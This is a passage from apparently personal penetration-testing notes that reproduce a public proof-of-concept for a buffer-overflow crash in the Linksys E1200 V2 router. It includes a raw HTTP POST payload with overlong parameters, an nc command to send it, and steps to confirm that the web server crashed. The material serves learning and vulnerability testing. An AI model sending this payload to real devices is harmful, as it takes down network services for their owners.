x. Proof-of-Concept (PoC) testing

In this section, we will be observing the behavior of the stack-based buffer overflow vulnerability present on the Linksys E1200 V2 router.

We will be working with the following CVE:

NVD - CVE-2025-60690nvd.nist.gov

and the following PoC:

SGTaint-0-day/Linksys/Linksys-E1200/CVE-2025-60690.md at main · yifan20020708/SGTaint-0-dayGitHub

The PoC is expected to invoke a denial of service on the router.

Payload

payload.txt

POST /cgi-bin/get_merge_ipaddr HTTP/1.1
Host: <router_ip>
User-Agent: <user_agent> 
Content-Type: application/x-www-form-urlencoded
Content-Length: 400

param_0=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&param_1=BBBBBBBBBBBBBBBBBBBBBBBBBBBBB&param_2=CCCCCCCCCCCCCCCCCCCCCCCCCCCCC&param_3=DDDDDDDDDDDDDDDDDDDDDDDDDDDD

Example

POST /cgi-bin/get_merge_ipaddr HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 400

param_0=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&param_1=BBBBBBBBBBBBBBBBBBBBBBBBBBBBB&param_2=CCCCCCCCCCCCCCCCCCCCCCCCCCCCC&param_3=DDDDDDDDDDDDDDDDDDDDDDDDDDDD

Send the payload

$ cat payload.txt | nc -v <router_ip> 80

Verify crash

We can use a few methods to verify the crash:

1. UART console

• crash messages such as segmentation faults

• httpd process changes

  • PID changed

  • process killed

$ ps w | grep httpd

1. Test network services

$ ping <router_ip>
$ curl http://<device_ip>:80
$ nc -u -v <device_ip> 53

...

Refer to the section "Basic network services testing" for more information:

3. Networking | Penetration testing & ethical hacking conceptsjarrettgxz-sec.gitbook.io

1. Using GDB on the real-time process

$ ...

...